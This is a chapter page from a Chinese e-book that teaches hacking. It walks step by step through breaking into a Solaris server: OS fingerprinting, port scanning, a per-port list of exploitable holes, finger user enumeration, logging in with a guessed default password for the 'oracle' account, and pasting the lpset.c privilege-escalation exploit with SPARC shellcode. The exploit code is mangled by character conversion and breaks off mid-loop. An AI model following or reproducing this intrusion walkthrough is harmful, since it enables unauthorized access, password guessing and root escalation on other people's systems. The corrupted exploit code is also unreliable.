爱爱小说网 > 体育电子书 > 30天打造专业红客 >

第16章

30天打造专业红客-第16章

小说: 30天打造专业红客 字数: 每页3500字

按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!



    TTL 《 200的,都是Windows 9x或Windows NT系统。
    telnet主机:
    主要看看telnet的banner。
    D:》telnet 127。0。0。17
    SunOS 5。7
    login:
    solaris 7 的。
    接着,我用Superscan扫描主机的端口。
    方法:
    打开superscan。
    设置:
    IP:
    Start:127。0。0。17
    Stop:127。0。0。17
    Scan Type:(扫描类型设置。)
    All ports from:1|65535
    然后,点击“Start”,开始扫描。 
    扫描完毕后,点击“Expand All”,把所有扫描到的端口打开。 
    * + 211。99。25。1
    |___ 7 Echo
    |___ 9 Discard
    |___ 13 Daytime
    |___ 19 Character Generator
    |___ 21 File Transfer Protocol 'Control'
    |___ 23 Telnet
    |___ 25 Simple Mail Transfer
    |___ 37 Time
    |___ 53 Domain Name Server
    |___ 79 Finger
    |___ 111 SUN Remote Procedure Call
    |___ 512 remote process execution;
    |___ 513 remote login a la telnet;
    |___ 514 cmd
    |___ 515 spooler
    |___ 540 uucpd
    主要的端口有:21、25、53、79、111、513
    其他还有:22、80等
    端口的主要漏洞:
    21:FTP的端口。主要漏洞是ftpd。如果允许anonymous(匿名)用户,而且具有读写权限,那么那台机子就是你的啦。假如你具有读写权限的用户密码,那就更加容易了。
    22:ssh的端口。例如:SSH 3。0的远程登录漏洞等。
    25:sendmail的端口。利用它的漏洞,我们可以D。O。S主机。freebsd的8。8。3版本还可以远程溢出rootshell。
    53:DNS的端口。主要漏洞是bind。对于bind 8。2的DNS服务器,我们可以利用exploit溢出一个rootshell。
    79:finger的端口。在unix和liunx都很有作用。对于Sunos,我们可以 finger 0@***。***。***。*** 刺探用户。对于,liunx可以 finger @***。***。***。*** 刺探当前在线的用户。
    80:web的端口。这个端口就是我们平时浏览网站的默认端口。主要的漏洞有CGI漏洞。
    111:rpc的端口。rpc漏洞是当今最流行的漏洞之一。每一个漏洞都可以远程溢出rootshell。例如:redhat的rpc。statd,Solaris的rpc。ttdbserverd等。
    513:rlogin的端口。你可以向主机发送一条:echo '+ +' 》/。rhost 如果成功,就可以不用密码rlogin到主机。
    finger主机。
    目的是利用finger漏洞寻找主机的用户。(取得主机的用户对入侵主机有很大帮助。)
    D:》finger 0@127。0。0。17
    '127。0。0。17'
    Login NameTTYIdle When Where
    daemon ??? 《 。  。  。  。 》
    bin ??? 《 。  。  。  。 》
    sys ??? 《 。  。  。  。 》
    chenhy ???pts/7   61。158。255。225
    mdevice???897  61。140。253。142
    liuy???pts/5   211。101。132。50
    oracle ???console  6:57 Mon 14:29  :0
    oracle ???pts/24d Mon 14:29  :0。0
    oracle ???pts/522 Sat 16:34  61。140。253。142
    D:》
    存在finger漏洞。系统的用户显示出来了。(chenhy、mdevice、liuy、orcle)
    oracle,通常oracle的密码就是oracle。
    马上试一下!
    D:》telnet 127。0。0。17
    SunOS 5。7
    login: oracle
    Password:
    Last login: Sat Aug  4 17:25:49 from 61。140。253。142
    Sun Microsystems Inc。SunOS 5。7 Generic October 1998
    
    成功了!
    假如在这一步并没有猜到用户的密码,我们可以利用其他工具继续猜测。
     
    命令:uname …a
    查看主机的信息。 
    uname …a
    SunOS mars 5。7 Generic_106541…08 sun4u sparc SUNW;Ultra…5_10
    SunOS mars 5。7:SunOS的版本。
    sparc:服务器版本。
    Generic_106541…08:补丁情况。
     
    找到exploit:lpset。c
    cat 》lpst。c
    /*## copyright LAST STAGE OF DELIRIUM apr 2000 poland  *://lsd…pl/ #*/
    /*## /usr/bin/lpset #*/
    #define NOPNUM 864
    #define ADRNUM 132
    #define ALLIGN 3
    char shellcode''=
     〃x20xbfxffxff〃  /* bn;a   */
     〃x20xbfxffxff〃  /* bn;a  */
     〃x7fxffxffxff〃  /* call   */
     〃x90x03xe0x20〃  /* add  %o7;32;%o0  */
     〃x92x02x20x10〃  /* add  %o0;16;%o1  */
     〃xc0x22x20x08〃  /* st%g0;'%o0+8' */
     〃xd0x22x20x10〃  /* st%o0;'%o0+16'*/
     〃xc0x22x20x14〃  /* st%g0;'%o0+20'*/
     〃x82x10x20x0b〃  /* mov  0xb;%g1  */
     〃x91xd0x20x08〃  /* ta8  */
     〃/bin/ksh〃
    ;
    char jump''=
     〃x81xc3xe0x08〃  /* jmp  %o7+8 */
     〃x90x10x00x0e〃  /* mov  %sp;%o0  */
    ;
    static char nop''=〃x80x1cx40x11〃;
    main(int argc;char **argv){
     char buffer'10000';adr'4';*b;
     int i;
     printf(〃copyright LAST STAGE OF DELIRIUM apr 2000 poland  //lsd…pl/n〃);
     printf(〃/usr/bin/lpset for solaris 2。6 2。7 sparcnn〃);
     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10088+400;
     b=buffer;
     sprintf(b;〃***=〃);
     b+=4;
     for(i=0;i

返回目录 上一页 下一页 回到顶部 0 1

你可能喜欢的